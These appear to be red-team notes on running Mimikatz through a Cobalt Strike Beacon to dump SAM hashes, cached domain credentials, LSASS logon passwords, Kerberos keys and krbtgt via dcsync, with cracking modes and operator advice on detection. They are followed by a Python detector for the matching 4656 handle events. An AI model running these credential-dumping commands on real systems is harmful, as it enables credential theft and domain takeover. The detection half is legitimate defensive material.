Mimikatz
Cobalt Strike + Mimikatz
Cobalt Strike's built-in mimikatz command runs each invocation in a new temporary process, which is destroyed once the command finishes. State such as an elevated token therefore does not survive from one invocation to the next, so commands that depend on each other have to be chained in a single invocation, separated by a semicolon:
beacon> mimikatz token::elevate ; lsadump::sam
Modifier Keys
!
In most cases, ! is a direct replacement for token::elevate. For example:
beacon> mimikatz !lsadump::sam
@
The @ modifier impersonates Beacon's thread token before running the given command, which is useful when Mimikatz needs to interact with a remote system, such as with dcsync.
beacon> mimikatz @lsadump::dcsync /user:DEV\krbtgt
Dumping Security Account Manager (SAM)
beacon> mimikatz !lsadump::sam
Note: This opens a handle to the SAM registry hive, which is the behaviour a "Suspicious SAM Hive Handle" detection keys on.
Dumping Cached Domain Credentials (DCC)
beacon> mimikatz !lsadump::cache
We can crack the hashes with hashcat (mode 2100 for the DCC2 / MS Cache v2 hashes modern Windows stores; mode 1100 for the older DCC1 format). Example hashes can be found here.
Note: This opens a handle to the SECURITY registry hive, which is what a "Suspicious SECURITY Hive Handle" detection looks for.
Dumping NTLM Hashes
beacon> mimikatz !sekurlsa::logonpasswords
Note: Mimikatz's logonpasswords module opens a read handle to LSASS. Where object access auditing is enabled and LSASS carries a SACL, this is logged as Windows event 4656 ("A handle to an object was requested") and is what a "Suspicious Handle to LSASS" detection keys on. Use this cautiously, and only if needed.
Dumping Kerberos Encryption Keys
beacon> mimikatz !sekurlsa::ekeys
Note: This module also opens a read handle to LSASS.
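The following Python detector is an added example, not code from the page and not Cobalt Strike's or Mimikatz's own. It covers the three detection notes above in one place: handles to LSASS that include PROCESS_VM_READ (the sekurlsa modules), and handles to the SAM and SECURITY hives (lsadump::sam and lsadump::cache), run over constructed 4656 message bodies. The field names "Object Type", "Object Name", "Process Name" and "Access Mask" are the event's own; the events, paths, handle IDs and the allowlist are made up for the example. Caveat: 4656 only fires for these objects when object access auditing is enabled and the target object has a SACL; for the LSASS case, Sysmon event 10 (ProcessAccess) is the usual alternative source.

```python
import re
from typing import List, Optional, Tuple

# Process access rights from winnt.h that matter for reading LSASS memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Images that legitimately open these objects. This allowlist is an assumption for the
# example; tune it per environment and pair it with image-integrity checks, since an
# attacker can name a dropped binary after an allowlisted path.
ALLOWLIST = {
    r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\services.exe",
}


def parse_4656(message: str) -> dict:
    """Extract the fields a detection needs from a 4656 message body ("Field: value" lines)."""
    fields = dict(re.findall(r"^\s*([A-Za-z ]+?):[ \t]+(.+?)[ \t]*$", message, re.M))
    return {
        "object_type": fields.get("Object Type", ""),
        "object_name": fields.get("Object Name", ""),
        "process_name": fields.get("Process Name", ""),
        "access_mask": int(fields.get("Access Mask", "0x0"), 16),
    }


def _under_hive(object_name: str, hive: str) -> bool:
    """True if a lowercased registry object path is the given HKLM hive or a key beneath it."""
    prefix = "\\registry\\machine\\" + hive
    return object_name == prefix or object_name.startswith(prefix + "\\")


def classify(event: dict) -> Optional[str]:
    """Return the rule name a parsed 4656 event trips, or None."""
    if event["process_name"].lower() in ALLOWLIST:
        return None
    name = event["object_name"].lower()
    if event["object_type"] == "Process" and name.endswith("\\lsass.exe"):
        # sekurlsa needs to read LSASS memory; a handle without VM_READ (e.g. a
        # process viewer querying basic information) is not interesting here.
        if event["access_mask"] & PROCESS_VM_READ:
            return "Suspicious Handle to LSASS"
    if event["object_type"] == "Key":
        if _under_hive(name, "sam"):
            return "Suspicious SAM Hive Handle"
        if _under_hive(name, "security"):
            return "Suspicious SECURITY Hive Handle"
    return None


def run_detection(messages) -> List[Tuple[str, str]]:
    """(rule, requesting process) for every message that trips a rule, in input order."""
    hits = []
    for message in messages:
        event = parse_4656(message)
        rule = classify(event)
        if rule:
            hits.append((rule, event["process_name"]))
    return hits


# Constructed 4656 message bodies in the layout of the real event, trimmed to the
# fields used here. rundll32.exe stands in for Beacon's temporary mimikatz process.
SAMPLE_EVENTS = [
    """A handle to an object was requested.
Object:
  Object Server:  Security
  Object Type:    Process
  Object Name:    \\Device\\HarddiskVolume2\\Windows\\System32\\lsass.exe
  Handle ID:      0x1a4
Process Information:
  Process ID:     0x1c48
  Process Name:   C:\\Windows\\System32\\rundll32.exe
Access Request Information:
  Access Mask:    0x1010
""",
    """A handle to an object was requested.
Object:
  Object Type:    Key
  Object Name:    \\REGISTRY\\MACHINE\\SAM\\SAM\\Domains\\Account\\Users
Process Information:
  Process Name:   C:\\Windows\\System32\\lsass.exe
Access Request Information:
  Access Mask:    0x20019
""",
    """A handle to an object was requested.
Object:
  Object Type:    Process
  Object Name:    \\Device\\HarddiskVolume2\\Windows\\System32\\lsass.exe
Process Information:
  Process Name:   C:\\Windows\\System32\\Taskmgr.exe
Access Request Information:
  Access Mask:    0x1000
""",
    """A handle to an object was requested.
Object:
  Object Type:    Key
  Object Name:    \\REGISTRY\\MACHINE\\SECURITY\\Cache
Process Information:
  Process Name:   C:\\Windows\\Temp\\svc.exe
Access Request Information:
  Access Mask:    0x20019
""",
]

if __name__ == "__main__":
    for rule, proc in run_detection(SAMPLE_EVENTS):
        print(f"{rule}: {proc}")
```

The hive checks match the whole hive and anything beneath it, so a key such as \REGISTRY\MACHINE\SAMPLE would not trip the SAM rule; the LSASS check requires VM_READ so that routine process enumeration by tooling with only query rights stays quiet.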